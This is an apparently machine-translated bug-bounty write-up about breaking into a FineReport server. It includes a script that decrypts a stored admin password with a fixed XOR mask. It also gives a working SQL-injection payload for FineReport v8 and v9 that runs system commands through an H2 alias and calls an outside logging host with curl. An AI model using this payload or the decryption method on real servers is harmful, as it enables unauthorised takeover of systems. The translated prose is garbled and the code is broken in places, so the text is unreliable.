The ReportServe deployment page is found on port 8080.

You can see that the user is POsun and the password needs to be decrypted

Decryption script:

Cipher = '___0022007c0039003b005100e3' # PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, For I in range(int(len(cipher) / 4)): c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16) c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8] Password = Password + chr(c2) print (Password)Copy the code

Decrypt 123456, the question is where to log in, suddenly realized that there was a data decision system, take to log in the data decision system.

FineRePort unauthorized remote command execution vulnerability

Affected version:

• • Sail soft report FineRePortv8.0
  • Sail soft report FineRePortv9.0

Xxx.com/WebReport/ReportServer?op=fr_log&cmd=fg_errinfo&fr_username=admin this interface open point query burp intercept packets to replace the content of the post __parameters__={"LABEL1":"TYPE:","TYPE":"6; CREATE ALIAS RUMCMD FOR "com.fr.chart.phantom.system.SystemServiceUtils.exeCmd"; CALL RUMCMD('curl http://uki7s7.ceye.io'); select msg, trace, sinfo, logtime from fr_errrecord where 1=1","LABEL3":"START_TIME:","START_TIME":"2020-08-11 00:00","LABEL5":"END_TIME:","END_TIME":"2020-08-11 16:41","LABEL7":"LIMIT:","LIMIT":2}Copy the code

Operation, the premise is to know the user name

Hole address: XXX. XXX. XXX. XXX: 8080 / ReportServe…

Note: just at the beginning of the opposite audit SRC is dead or alive not to come out, hand in hand, here there are a few problems note, the query can not be too frequent easy to fill up the number of concurrent, need to wait for a period of time, I later the next day to empty the number of concurrent.

conclusion

• Look for details, like the real IP just popped up
• Do not panic in the face of small harm loopholes, keep can also combine other loopholes.